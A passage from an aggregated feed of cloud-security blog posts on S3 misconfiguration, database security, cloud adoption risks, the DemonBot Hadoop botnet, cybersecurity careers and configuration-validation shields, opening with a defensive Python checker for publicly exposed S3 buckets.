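    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
# The four flags of PutPublicAccessBlock; all True = nothing public via ACL or policy
BLOCK_ALL = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
             "BlockPublicPolicy": True, "RestrictPublicBuckets": True}


def public_acl_grants(acl):
    """(group, permission) pairs that grant the bucket to everyone (GetBucketAcl shape)."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            hits.append((grantee["URI"].rsplit("/", 1)[-1], grant["Permission"]))
    return hits


def _wildcard_principal(principal):
    """True for Principal "*" or {"AWS": "*"} (also when "*" sits in a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in (aws if isinstance(aws, list) else [aws])
    return False


def public_policy_statements(policy):
    """Sids of unconditional Allow statements open to any principal."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    stmts = policy.get("Statement", [])
    stmts = stmts if isinstance(stmts, list) else [stmts]
    hits = []
    for s in stmts:
        if s.get("Effect") != "Allow" or not _wildcard_principal(s.get("Principal")):
            continue
        # A Condition (e.g. aws:SourceVpce) can scope a wildcard grant, so only
        # the unconditional case is flagged here; S3 evaluates the full policy.
        if "Condition" not in s:
            hits.append(s.get("Sid", "<no Sid>"))
    return hits


def assess(acl, policy=None):
    """Combined verdict for one bucket: which ACL grants and policy statements are public."""
    return {"acl": public_acl_grants(acl),
            "policy": public_policy_statements(policy) if policy else []}


def block_public_access(bucket, s3=None):
    """Apply the bucket-level block (s3 = boto3.client("s3")); returns the config used."""
    if s3 is not None:
        s3.put_public_access_block(Bucket=bucket,
                                   PublicAccessBlockConfiguration=BLOCK_ALL)
    return BLOCK_ALL


# Constructed samples in the shapes GetBucketAcl / GetBucketPolicy return
SAMPLE_ACL = {"Owner": {"ID": "owner"}, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]}
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
]})
```

The VpcOnly statement is deliberately not flagged: a wildcard principal scoped by a condition is how S3 endpoints inside a VPC are commonly granted access, and treating it as public would bury the real findings in noise.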
The post New security feature to prevent Amazon S3 bucket misconfiguration and data leaks appeared first on Help Net Security.
By Roberto Mircoli, CTO EMEA at Virtustream. Government and public sector organisations continue to seek ways to improve services and mitigate the risk of migrating mission-critical applications to the cloud.
Amazon announced this week that a new feature designed to prevent data leaks has been added to Amazon Web Services (AWS).
Helping our customers reduce the risks associated with migrating to the cloud, and preventing availability and security incidents, has been a major development focus for Imperva over the last several years.
Why the partnership matters
Although cloud service providers take a host of IT management burdens off of your shoulders when using their platforms, service level agreements (SLA) for platform availability and security don’t cover what runs on the platform. While they protect the platform itself, they are very clear that management, compliance and security responsibilities for your applications and data are yours alone. Amazon calls this a Shared Responsibility Model.
What we do
For applications, Imperva helps customers ensure they don’t suffer from network and transport layer (Layers 3-4) or application layer (Layer 7) Distributed Denial of Service (DDoS) attacks, and protects against all OWASP Top 10 application security risks and even zero-day attacks. Imperva application security is a top-rated solution by both Gartner and Forrester for both WAF and DDoS protection.
Additionally, for cloud database migrations, Imperva helps ensure customers don’t leave gaps in their compliance and security controls as they migrate their database to the AWS EC2 Infrastructure as a Service (IaaS) platform. As of December 2017, we also cover Platform as a Service (PaaS) offerings such as Amazon RDS.
Most organizations operate hybrid IT environments, hosting some applications and data in on-premises data centers, and some on public cloud platforms – or multiple vendor cloud platforms. Imperva supports these configurations and provides solutions to integrate security into Continuous Integration and Continuous Deployment (CI/CD) processes used by DevOps project teams.
Imperva recently acquired the Prevoty Runtime Application Self Protection (RASP) solution; so our customers can automate security deployment in DevOps project delivery processes, to ensure applications and data are always protected.
Stop by the Imperva booth at re:Invent 2019 and get a personal update on our solutions for AWS, and don’t miss our subject matter expert, Peter Klimek, speak about strategies for a proactive and preventative security approach in session “DEM44: Security Challenges in a DevOps World” in the Expo Pilvi Theatre.
The post Imperva and Amazon Partner to Help Mitigate Risks Associated With Cloud Migration appeared first on Blog.
Organizations Need the Right Technologies and Talent in Place to Ensure a Secure Transition to the Cloud
If we asked database administrators, security teams, and risk teams about their definition of what database security is, the answers would vary widely.
Each team views the definition based on their own requirements, but the one answer that most likely won’t appear is: “To protect data.”
Traditionally, database security has always been seen as a means to protect the database systems from vulnerabilities, missing patches, simple misconfigurations, or SQL injections. While this certainly holds true in today’s environments too, we cannot ignore the fact that requirements for securing a company’s most valuable asset—its data—have changed.
Adding data to database security
With the increase in regulatory compliance requirements such as PCI-DSS, HIPAA, SOX, and GDPR, enterprises are asking more and more from their data protection solutions. Data is seen as the new oil—a way to fuel companies. Protecting data must be at the core of every strategy. Where better to start than the one place most data resides, the database?
Database security solutions in today’s data- and compliance-driven environments must not only allow companies to measure the level of security of their databases but must also provide the ability to locate personally identifiable data, business-critical data, and any other data that is of value to the organization.
In addition, any data that is discovered must be monitored, in real time, 24/7. Long gone are the days when audit logs were sufficient or simple network monitoring was considered adequate. Data is the world’s greatest asset and companies must invest in protecting their own data as well as their customers’ data.
As-a-service: a world of shared responsibilities
Database(s)-as-a-service is one of the fastest growing markets within the world of cloud. It provides organizations with unparalleled amounts of scalability and compute power while at the same time removing many of the challenges that we would see as traditionally related to database security (vulnerability and patch management, for example). In the shared responsibility world of the cloud, the one constant is data. Customers are always responsible for protecting and monitoring their data.
Too many data breaches are successful because the exfiltration of data was made possible by either very little or no real-time monitoring of the data. Traditional database security is not designed to protect data, it’s designed to protect the database from malicious SQL injections or vulnerabilities. One might argue that is data protection. But in reality, database security in today’s data-driven environments must allow organizations to monitor anyone and anything that accesses the “crown jewels,” in real time, with the ability to stop unauthorized access to data.
McAfee helps fill that gap by offering software-based database security solutions that allow the monitoring of database instances across both on-premises solutions and the cloud. Non-intrusive, lightweight, and easy to deploy, McAfee database security solutions allow customers to enjoy all the benefits of moving to a hybrid cloud enterprise database environment while retaining control over security, risk, and data protection.
For more information, visit the database security product information page.
The post Why Traditional Database Security Doesn’t Protect Data appeared first on McAfee Blogs.
Report Demonstrates that Security Needs to be Included in Containerization
Enterprises using infrastructure-as-a-service (IaaS) or platform-as-a-service (PaaS) solutions have 14 misconfigured instances on average running at a given time.
A recent cloud adoption study by McAfee found that organizations have increased their usage of the cloud over time. The average number of cloud services in use per company grew from 1,682 in 2017 to 1,935 a year later. This growth was evident in both the number of enterprise cloud apps and consumer cloud apps.
But while organizations are increasingly turning to the cloud to satisfy their business needs, they aren’t taking the necessary steps to safeguard their cloud-based assets, the researchers observed. According to the report, some of the most common oversights involved inactive data encryption and unrestricted outbound access.
How Do Cloud Misconfigurations Put Data at Risk?
Cloud misconfigurations directly jeopardize organizations’ data. McAfee customers who turn on data loss prevention (DLP) discovered an average of 1,527 DLP incidents in their IaaS or PaaS storage per month. Overall, 27 percent of organizations using PaaS experienced a data theft incident affecting their cloud infrastructure.
Part of the problem is that no two cloud service providers (CSPs) offer the same security controls. Some CSPs even lack some of the most basic security measures. Just 8 percent of providers encrypt data at rest, for instance, while only 19.2 percent support multifactor authentication (MFA).
How to Cope With Increasing Cloud Adoption
Security professionals can help their organizations stay protected amid increasing cloud adoption by embedding corporate security policies into contracts with CSPs. They should also consider conducting regular penetration tests to map their environments for vulnerabilities.
More than ever, customers understand their right to data privacy. As major brands continue to lose sensitive data to cybercriminals in high-profile cloud security failures, customer trust in companies across industries is fading. Only 25 percent of consumers believe most companies handle their data responsibly, according to PricewaterhouseCoopers (PwC). As a result, secure, transparent data handling practices are more imperative than ever.
New regulations signal that governing bodies are also taking the enterprise’s responsibility for data privacy very seriously. The Brazil Privacy Act and the California Consumer Privacy Act support the consumer’s right to understand how their data is collected and used, and the New York Department of Financial Services (NYDFS) requirements are among the first regulations to address cloud security risks. Proposed rules require financial institutions to conduct vulnerability assessments and practice data classification and safe data management, whether the data resides on-premises or in the cloud.
Misconfigurations Cause Database Security Mayhem
Despite increased pressure to protect customer data, security teams are still struggling to address database security risks. Misconfigured servers, networked backup incidents and other system misconfigurations resulted in the exposure of 2 billion data records in 2017, according to the “IBM X-Force Threat Intelligence Index 2018” — that’s a 424 percent increase in such data breaches over last year’s total.
Cybercriminals are innovating quickly to take advantage of enterprise cloud security challenges. Many are using and creating open source tools to scan the web for unprotected cloud storage and, in some cases, locking these systems for ransom. Results from a Threat Stack study indicated that the majority of cloud databases are unprotected or otherwise misconfigured. Researchers attributed the prevalence of misconfigurations to employee negligence and insufficient IT policies.
Why the Enterprise Cloud Is Vulnerable
Still, it would be unfair to blame the current state of enterprise cloud security on employee negligence — at least, not entirely. Critical misconfigurations are technically the result of inadvertent insider error, but the reality is a bit more complex. Correcting configurations and compliance risks is difficult because security teams lack actionable visibility into cloud risks. There’s a glut of security risk to deal with, and traditional approaches to assessing risk result in an abundance of data with little actionable intelligence.
The enterprise cloud environment is complex and difficult to capture with vulnerability assessment tools designed for physical network and endpoint risk assessments. The unstructured, NoSQL landscape of big data in the cloud evolves on a near-daily basis to accommodate new forms of unstructured data. It’s no wonder that assessing database security risk across heterogeneous environments is often compared to finding a needle in a haystack.
Layered vulnerability assessments are crucial to protect against cloud security and compliance risks. Under some recent regulatory requirements, in fact, vulnerability assessments are mandatory. However, the enterprise needs vulnerability solutions that can support the scale of cloud database-as-a-service (DBaaS), traditional on-premises databases, warehouses and big data environments in a meaningful way.
Advanced analytics are necessary to sort through complex event data to correlate patterns and find true outliers that are associated with meaningful risk of data loss or advanced threats. The sheer volume and variety of data in the enterprise cloud requires proactive vulnerability assessment. A vulnerability assessment solution should automate risk prioritization, recommend remediation and simplify complex compliance requirements.
How to Achieve Real-Time Security and Compliance in Cloud or Hybrid Environments
Reducing risk requires visibility and control with an adaptive, real-time approach to understanding exposure. In a database environment, assessments should actively examine privileges, authentication, configuration, versioning and patching. Finding and remediating advanced threats from insiders, ransomware and data breaches requires advanced analytics. Your vulnerability assessment solution should rank risks based on the importance of data and breach likelihood and recommend remediation actions.
Security and risk are convening in the enterprise, and vulnerability tools should deliver risk intelligence that can be shared with the chief information officer (CIO), chief security officer (CSO) and chief risk officer (CRO). Enterprise cloud environments are complex, but a vulnerability assessment tool can provide a consolidated and actionable view into risk, remediation, compliance and policy. To drive continued value, however, a vulnerability assessment solution must scale to new services as new applications, databases and cloud services are deployed over time.
The cloud has shifted the landscape and created the need for a new approach to assessing risks. If understanding compliance and configurations feels like finding needles in a haystack, it may be time to automate. Data privacy is now a compliance and customer imperative, and understanding the state of your databases is critical, so aim to scale your security assessments with a solution designed for the complexities of the enterprise cloud environment.
The post How Can Companies Move the Needle on Enterprise Cloud Security Risks and Compliance? appeared first on Security Intelligence.
The IT industry has gone through lots of changes over the past few years, yet when it comes to cybersecurity, the mindset has remained the same. The current thinking around cybersecurity falls into the definition of insanity, with many organisations doing the same thing over and over again, expecting different results, and are then shocked when their company is the latest to hit the hacking headlines.
The current security model is broken and is currently too complex. As Paul German, CEO, Certes Networks, argues, it’s time to strip network security back and focus on the data.
What should Organisations Really be Protecting?
Ultimately, by overcomplicating network security for far too long, the industry has failed - which won’t come as a surprise to many. We’ve all learned the lessons from high-profile data breaches such as Dixons Carphone and historical breaches like Ticketmaster or Target; what they showed us was that current attempts to secure corporate networks are just not enough. And the reason for this? Quite simply, organisations are trying to protect something they no longer own. For a long time, security thinking has focused purely on the network, homing in on the insecurity of the network and trying to build up network defences to protect the data that runs over it.
Yet this way of thinking leaves a problem untouched: we don’t always own the networks over which our data runs, so focusing on the network alone leaves many other doors wide open. The corporate network used to stay within the data centre, but in today’s digital economy it spans corporate locations worldwide, including data centres, private clouds and public clouds. Additionally, data is shared not just with employees but with third parties, whose devices and policies cannot be easily controlled. Add legacy security measures that simply weren’t constructed to address the complexity and diversity of today’s corporate network, and it is clear why this is no longer enough.
So, what needs to change? First and foremost, the industry needs to take a step in the right direction and put data at the forefront of security strategies.
The Security Mindset Needs to Change - and It Needs to Change Now
In an attempt to keep their data and infrastructure secure, organisations have layered technology on top of technology. As a result of this, not only has the technology stack itself become far too complicated but the number of resources, operational overhead and cost needed to manage it have only contributed to the failing security mindset.
Anyone in the IT industry should be able to acknowledge that something needs to change. The good news is that the change is simple. Organisations need to start with a security overlay that covers the networks, independent of the infrastructure, rather than taking the conventional approach of building the strategy around the infrastructure. The network itself must become irrelevant, which will then encourage a natural simplicity in approach.
As well as enabling organisations to better secure their data, this approach also has economic and commercial benefits. Taking intelligence out of the network allows organisations to focus it on its core task: managing traffic. In turn, money and resources can be saved and then better invested in a true security model with data protection at its heart.
A New Era of Cybersecurity
To begin this mindset change, organisations need to start thinking about security as an overlay on top of existing infrastructure. They also need to introduce a software-defined approach to data security, enabling centralised orchestration of security policy. With that orchestration enforcing capabilities such as software-defined application access control, cryptographic segmentation, data-in-motion privacy and a software-defined perimeter, data is protected on its journey across any network, and attackers are restricted from moving laterally once a breach has occurred. Additionally, adopting approaches such as Layer 4 encryption, which encrypts the payload (rendering the data itself useless, and therefore worthless, to attackers) while leaving the network and transport headers intact so that operational visibility of the enterprise network and data flows is not impacted, will further protect the organisation’s data.
The fact is that the industry has overcomplicated network security for too long. If the industry continues to try the same methods over and over again, without making any changes, then there is no chance of progression. It’s time for organisations to start afresh and adopt a new, simple software-defined security overlay approach.
A new bot called DemonBot is targeting Hadoop clusters to execute distributed denial-of-service (DDoS) attacks.
The Radware Threat Research Center recently observed a threat actor exploiting a Hadoop Yet Another Resource Negotiator (YARN) unauthenticated remote command execution. This method of attack enables the malicious agent to infect Hadoop clusters with DemonBot (Hadoop is an open source distributed processing framework that helps big data apps run in clustered systems). Upon successful infection, the threat connects to its command-and-control (C&C) server and transmits information about the infected device.
Why Cloud Infrastructure Servers Are Juicy Targets
The threat’s goal is to leverage infected cloud infrastructure servers to conduct DDoS attacks. At this juncture, it is not exhibiting worm-like behavior akin to Mirai. Instead, it relies on 70 exploit servers for distribution, infrastructure that helps it perform 1 million exploits every day.
That being said, Radware found DemonBot to be binary-compatible with most Internet of Things (IoT) devices, which means the threat could spread to other types of products.
DemonBot isn’t the first bot to target cloud infrastructure servers like Hadoop clusters. In early October, a security researcher reported on Twitter that handlers of the Sora IoT botnet attempted to exploit the same YARN unauthenticated remote command execution abused by DemonBot.
Radware attributed the growing interest in Hadoop to the fact that cloud infrastructure servers allow bad actors to stage larger and more stable DDoS attacks using multiple vectors, such as User Datagram Protocol (UDP) and Transmission Control Protocol (TCP) floods.
How to Defend Against DemonBot
Security professionals can help protect their organizations against DemonBot by conducting a proper risk assessment on their cloud deployment. From there, they should enlist the help of penetration testers to map the vulnerabilities affecting their deployment.
Security teams should also look to invest in mitigation tools and services that specialize in defending against a DDoS attack.
The post DemonBot Targeting Hadoop Clusters to Perform DDoS Attacks appeared first on Security Intelligence.
Here’s some cool trivia for you: What profession currently has a zero-percent unemployment rate, pays an average of $116,000 a year, and is among the top in-demand jobs in the world? A lawyer? A pharmacist? A finance manager, perhaps?
Nope. The job we’re talking about is a cybersecurity specialist and, because of the increase in cyber attacks around the world, these professionals are highly employable.
According to numbers from the Bureau of Labor and Statistics, a career in cybersecurity is one of the most in-demand, high-paying professions today with an average salary of $116,000, or approximately $55.77 per hour. That’s nearly three times the national median income for full-time wage and salary workers. How’s that for job security?
Why is the demand so high? Sadly, because there are a lot of black hats (bad guys) out there who want our data — our user IDs, passwords, social security numbers, and credit card numbers. Every month it seems banks, hospitals, and major corporations are reporting security breaches, which has left the global cybersecurity talent pool at an estimated deficit of two million professionals.
It’s exciting to see gifts and passions emerge in our kids as they grow and mature. If a child is good at math and sciences, we might point them toward the medical field. If a child shows an affinity for English and communication skills, maybe a law, teaching, or media career is in their future.
But what about a cybersecurity expert? Have you noticed any of these skills in your kids?
Flexible/creative problem solving
Collaborative, team player
A sense of duty, justice
Works well under pressure
Curious and perceptive
Technology/tech trend fan
Verbal and written communications
Most jobs in cybersecurity require a four-year bachelor’s degree in cybersecurity or a related field such as information technology or computer science. Students take coursework in programming and statistics, ethics, and computer forensics, among other courses.
First, if your child has some of the skills/personality traits mentioned, how do you start directing him or her toward this field? The first place to begin is in the home. Model smart cybersecurity habits. Talk about digital safety, the importance of protecting personal data and the trends in cybercrimes. In short, model and encourage solid digital citizenship and family security practices.
Second, bring up the possibility, or plant the seed. Be sure to encourage both boys and girls equally. Help your child find answers to his or her questions about careers in computer and data science, threat research, engineering and information on jobs such as cybersecurity analyst, vulnerability analyst, and penetration tester.
Third, read and share takeaways from Winning The Game, a McAfee report that investigates the key challenges facing the IT Security industry and the possible link between teen gaming and a successful cybersecurity career.
CyberCompEx. A connection point for everything cybersecurity including forums, groups, news, jobs, and competition information.
CyberCorps® Scholarship for Service. SFS is a program providing scholarships and stipends to undergraduate and graduate students studying cybersecurity at participating institutions. Great for those who want to work in government.
CyberPatriot. This site is created by the Air Force Association (AFA) to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM).
GenCyber. This is a summer cybersecurity camp for K-12 students and teachers that focuses on inspiring kids to direct their talents toward cybersecurity skills and closing the security skills gap.
National CyberWatch Center. The National CyberWatch Center is a consortium of higher education institutions, public and private businesses, and government agencies focused on advancing cybersecurity education and strengthening the workforce.
National Initiative for Cybersecurity Careers and Studies. NICCS provides information on cybersecurity training, formal education, and workforce development.
National Initiative for Cybersecurity Education. NICE is an initiative to energize and promote a robust network and an ecosystem of cybersecurity education, cybersecurity careers, training, and workforce development.
*Resource list courtesy of Stay Safe Online.
The post Have You Talked to Your Kids About a Career in Cybersecurity? appeared first on McAfee Blogs.
Configurable systems have a high level of flexibility and are better adapted to most customer needs, but their management isn’t a trivial task in complex cloud deployments.
The configuration management concept isn’t new and originated in the United States Department of Defense in the 1950s as a technical management discipline for hardware material items. In a software environment, it has a different meaning, but the concept remains the same.
Let’s take a closer look at why it’s so important in our system and how we handle it.
Administrators, support engineers and anyone else who deals with services or products like configuration. Product or service parameterization allows adjustment to customer needs exactly as the customer requires. This can be done by a small modification of the default configuration or by enabling/disabling a feature. Of course, the default settings should be simple and meet the need in most cases, but they do not fit all of them.
As developers, we hate configuration: it makes for messy code. Configuration creates complexity, and every parameter in it, and every change to one, adds additional testing. Since developers don’t rule the world, however, we need to make do. On the other hand, we are responsible for providing a stable and reliable service, so how do we find a happy medium?
The simple answer to that would be “more unit-testing” or “more testing” to account for all possible scenarios, right? Well, some managers would agree, but the real world is a little bit more complicated than a Q/A lab. Our R&D and test automation teams are already doing a great job, but it’s not always enough since there are practically infinite combinations of configurations, and testing alone cannot mitigate the risk.
We know that configuration validation should be done in a real-time environment, so the Imperva Incapsula engineering team created a few mechanisms for self-protection. These mechanisms ensure close to zero impact for our customers in production, by checking correctness and fast recovery in the face of errors.
In this post, we’ll describe a few of those mechanisms, some basic, like schema validation, others more complicated, like configuration snapshot management.
Let’s kick it off with a simple configuration flow.
Customer configuration is transferred from one agent to another by employing what we refer to as a “shield”. In each case, every agent ensures the configuration is correct. We do this to achieve two goals:
- Catch the problem as fast as possible, because early detection is crucial for a timely resolution
- Some shields have overlapping protection for better detection
Let’s take a closer look at these shields. Every configuration asset is protected by several shields as described in the following illustration but not necessarily by all of them. Each shield is described below.
Management Console Configuration Shield
The Imperva Incapsula Management Console is used by both customers and operations staff. Its job is to receive configuration changes via the user interface or API, store them in the configuration database and notify the next agent that a configuration change has occurred.
The Management Console performs the following validations:
- Schema correctness – configuration structure is correct for both database storage and runtime components. For example, data types validation.
- Semantic correctness – any changed or added configuration is validated under its scope. For example, model state changes.
- Data relationships – data should be correct relative to another component in the system. For example, customer site name or GRE tunnel IPs.
Once a problem is detected, the user is immediately notified and the configuration update is rejected.
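The three Management Console checks above, as an added example that is not Imperva's code: a change is run through schema, semantic and data-relationship validation in that order, and the first failing stage rejects it. The field names, the existing site names and the allocated GRE tunnel IPs are constructed sample values.

```python
"""Added illustration of a three-stage configuration validation shield.
Not Imperva's implementation; field names and sample state are assumed."""
import ipaddress
import re

# Constructed system state used by the data-relationship checks.
EXISTING_SITE_NAMES = {"shop.example.com", "api.example.com"}
ALLOCATED_GRE_TUNNEL_IPS = {"10.0.0.1", "10.0.0.2"}

# Schema: field name -> type expected by both storage and runtime components.
SCHEMA = {"site_name": str, "enabled": bool, "gre_tunnel_ip": str, "rate_limit": int}

# RFC 1123-style hostname: dotted labels, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))+"
)


def check_schema(change):
    """Stage 1: structure and data types."""
    errors = []
    for key, value in change.items():
        if key not in SCHEMA:
            errors.append(f"unknown field: {key}")
            continue
        expected = SCHEMA[key]
        # bool is a subclass of int, so True/False must not pass as an int.
        wrong_bool = expected is int and isinstance(value, bool)
        if wrong_bool or not isinstance(value, expected):
            errors.append(f"{key}: expected {expected.__name__}, got {type(value).__name__}")
    return errors


def check_semantics(change):
    """Stage 2: each value is valid within its own scope."""
    errors = []
    if "rate_limit" in change and change["rate_limit"] <= 0:
        errors.append("rate_limit: must be a positive integer")
    if "site_name" in change and not HOSTNAME_RE.fullmatch(change["site_name"]):
        errors.append(f"site_name: {change['site_name']!r} is not a valid hostname")
    if "gre_tunnel_ip" in change:
        try:
            ipaddress.IPv4Address(change["gre_tunnel_ip"])
        except ValueError:
            errors.append("gre_tunnel_ip: not a valid IPv4 address")
    return errors


def check_relationships(change, sites=EXISTING_SITE_NAMES, tunnels=ALLOCATED_GRE_TUNNEL_IPS):
    """Stage 3: the value is consistent with other components in the system."""
    errors = []
    if change.get("site_name") in sites:
        errors.append(f"site_name: {change['site_name']!r} already exists")
    if change.get("gre_tunnel_ip") in tunnels:
        errors.append(f"gre_tunnel_ip: {change['gre_tunnel_ip']} already allocated")
    return errors


def validate_change(change, sites=EXISTING_SITE_NAMES, tunnels=ALLOCATED_GRE_TUNNEL_IPS):
    """Run the stages in order; stop at the first stage that reports errors,
    since later stages assume the earlier ones passed. An empty list means
    the change may be stored and propagated."""
    for stage in (check_schema, check_semantics):
        errors = stage(change)
        if errors:
            return errors
    return check_relationships(change, sites, tunnels)
```

The early return matters: a semantic check such as `rate_limit <= 0` would itself raise on a string value, so the schema stage must run first.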
Configuration Sandbox Shield
In addition to performing static validations, Imperva Incapsula also sandboxes configuration changes in a live system before propagating them to the production network. The goal of this step is to detect unexpected issues with the configuration.
The configuration is loaded into fully operational runtime nodes, which try to detect the problem, anomaly or incorrect behavior. Note that the runtime nodes do not serve customer traffic. In the unlikely event that a configuration error is detected, the configuration change is isolated and will not affect customer traffic.
As described in the illustration, at this point valid configuration changes reach production nodes and affect customer traffic. However, issues that originate from unexpected traffic patterns can still show up. So, an additional shield is required to ensure that such issues are handled gracefully.
Runtime Node Configuration Shield
Runtime nodes implement the last protection point, which allows them to recover from bad configuration changes, even ones that cause the process to abruptly terminate (crash). The mechanism keeps a Last Known Good (LKG) snapshot of the configuration repository and is able to revert to it when needed. As opposed to the previous shields, this one operates at the repository level. We chose that design because it can be very complicated to discover a single bad configuration change and we want to recover as quickly as possible.
This shield’s implementation covers the following stages:
- Background – the system maintains snapshots of LKG repositories
- Detection – the system detects issues with the repository
- Decision – the system decides whether a repository is safe to use or not
- Rollback – the system reverts to an LKG repository
- Recovery – once the configuration is fixed, the system recovers to the most recent version of the repository
This shield is our last line of defense, and we do not expect it to take action on a daily basis. However, if that occurs, our monitoring systems notify the relevant teams to immediately investigate and find the root cause of the issue, as described in our post: How to Tame “Monitorture” and Build a Developer-Friendly Monitoring Environment.
Runtime Node Configuration Shield Implementation
In this last section, I’d like to share some details about how we implemented the runtime node configuration shield.
We keep the configuration in files, so we wanted to find a solution at the file-system level. We evaluated several options for file-system snapshot management and decided to go with Btrfs storage, which is based on the copy-on-write (COW) principle. Btrfs has built-in snapshot functionality and meets our performance requirements.
Over Btrfs, we implemented a small open-source component, which is run as a service and creates snapshots for different repositories defined in our system. This component is generic and can be used by any product to achieve the same goal.
The following configuration is an example of possible repositories:
[Figure: configuration example of this service]
A repository represents the Btrfs device managed by the snapper, while a snapshot_level represents a snapshot frequency and links to the latest snapshot taken at that level. Each repository can define several snapshot levels based on business logic or on the frequency of configuration changes.
The snapper creates a snapshot periodically based on its configuration, but stops if any defined “stopper” exists.
Runtime components use the master configuration until a configuration problem is detected. Once one is detected, the component tries to load the latest good snapshot through the links defined in the configuration. In addition, a stopper should be created, or the snapper otherwise ordered to stop, so that the bad configuration is not snapshotted.
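The snapshot levels, stopper and LKG rollback described above, as an added example that is not Imperva's open-source snapper: plain directory copies stand in for Btrfs copy-on-write snapshots so the code runs anywhere, and the level names, intervals and config file name are assumed. The scenario in `demo()` shows why more than one level is useful: a bad change lands, the fast level snapshots it before anything notices, and the runtime node has to fall back to the slower level.

```python
"""Added simulation of an LKG snapshot shield with snapshot levels and a stopper.
Not Imperva's code; uses directory copies instead of Btrfs subvolumes."""
import json
import os
import shutil
import tempfile

CONFIG_FILE = "config.json"  # assumed name of the repository's configuration file


class Snapper:
    """Periodically snapshots a repository at several levels, unless a stopper exists."""

    def __init__(self, repo, levels, snapshot_dir):
        self.repo = repo                      # master configuration repository
        self.levels = levels                  # level name -> interval in seconds
        self.snapshot_dir = snapshot_dir
        self.stopper = os.path.join(snapshot_dir, "STOP")   # stopper marker file
        self.last_taken = {level: None for level in levels}
        self.latest = {level: None for level in levels}     # link to latest snapshot per level

    def stopped(self):
        return os.path.exists(self.stopper)

    def stop(self):
        open(self.stopper, "w").close()

    def resume(self):
        if self.stopped():
            os.remove(self.stopper)

    def tick(self, now):
        """Take a snapshot for every level whose interval has elapsed; return those levels."""
        taken = []
        if self.stopped():
            return taken
        for level, interval in self.levels.items():
            last = self.last_taken[level]
            if last is None or now - last >= interval:
                dest = os.path.join(self.snapshot_dir, f"{level}-{int(now)}")
                shutil.copytree(self.repo, dest)   # Btrfs would take a COW snapshot here
                self.latest[level] = dest
                self.last_taken[level] = now
                taken.append(level)
        return taken


def write_config(repo, data):
    with open(os.path.join(repo, CONFIG_FILE), "w") as f:
        f.write(data if isinstance(data, str) else json.dumps(data))


def load_config(path):
    with open(os.path.join(path, CONFIG_FILE)) as f:
        return json.load(f)   # raises ValueError on a corrupt repository


class RuntimeNode:
    def __init__(self, snapper, level_order):
        self.snapper = snapper
        self.level_order = level_order   # preferred levels, most recent first

    def load(self):
        """Use master; on failure stop the snapper and fall back to the LKG levels in order."""
        try:
            return load_config(self.snapper.repo), "master"
        except (OSError, ValueError):
            self.snapper.stop()   # stopper: never snapshot the bad repository
        for level in self.level_order:
            path = self.snapper.latest[level]
            if path is None:
                continue
            try:
                return load_config(path), level
            except (OSError, ValueError):
                continue   # this level already captured the bad change; try the next
        raise RuntimeError("no usable configuration snapshot")


def demo():
    """Constructed scenario; returns which source served each load and what each tick snapshotted."""
    base = tempfile.mkdtemp()
    repo, snaps = os.path.join(base, "repo"), os.path.join(base, "snapshots")
    os.makedirs(repo)
    os.makedirs(snaps)
    write_config(repo, {"rate_limit": 100})
    snapper = Snapper(repo, {"fast": 60, "slow": 3600}, snaps)
    node = RuntimeNode(snapper, ["fast", "slow"])
    ticks, sources = [], []
    ticks.append(snapper.tick(1000.0))          # first tick: every level snapshots the good config
    sources.append(node.load()[1])              # master is fine
    write_config(repo, "{not json")             # a bad change lands in master
    ticks.append(snapper.tick(1070.0))          # fast level snapshots it before detection
    sources.append(node.load()[1])              # master fails, fast is bad, slow is good
    ticks.append(snapper.tick(1200.0))          # stopper present: nothing is snapshotted
    write_config(repo, {"rate_limit": 100})     # operators fix master
    snapper.resume()
    sources.append(node.load()[1])              # recovery: back on master
    shutil.rmtree(base)
    return {"ticks": ticks, "sources": sources}
```

Detection here is simply "the file does not parse"; in a real runtime node the same rollback path would also be taken after a crash on startup, which is why the stopper is a file on disk rather than in-process state.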
We believe that similar techniques can be used in any cloud service. These mechanisms help us provide a reliable service and we strive for a reality in which they will not be activated. But if they are, our customers can rest easy.
The post Read: How To Build Resilient Cloud Configuration Shields appeared first on Blog.
Cloud awareness and adoption continues to grow as more enterprises take advantage of the benefits that come with multiple cloud platforms. As this trend continues its upward trajectory, we see more tech vendors coming to market with new tools designed to address a variety of different challenges.
Whether you are switching up your multi-cloud strategy or starting from scratch, here are a few things your organization needs to know first about multi-cloud.
Determine what features will either make or break your multi-cloud strategy
When picking the best multi-cloud structure for your business, be bold. Build a vision for what you need cloud services to do for your company; worry less about “how” and more about the “why” and “what” you need from your providers. The reality is that top cloud providers in IaaS/PaaS and, separately, SaaS spaces are offering extremely versatile capabilities and compelling value. It is important to understand what features are make or break and which ones change the way your organization works when it comes to selecting vendors.
Outside of single requests for a new or different capability, your organization needs to rationalize the different needs for each down to “collections” of related needs. For example, consider SaaS for well-known, repeatable needs first, then look to move or re-deploy capability into IaaS or build natively in PaaS for efficient applications.
Security measurements that are important when architecting a multi-cloud structure
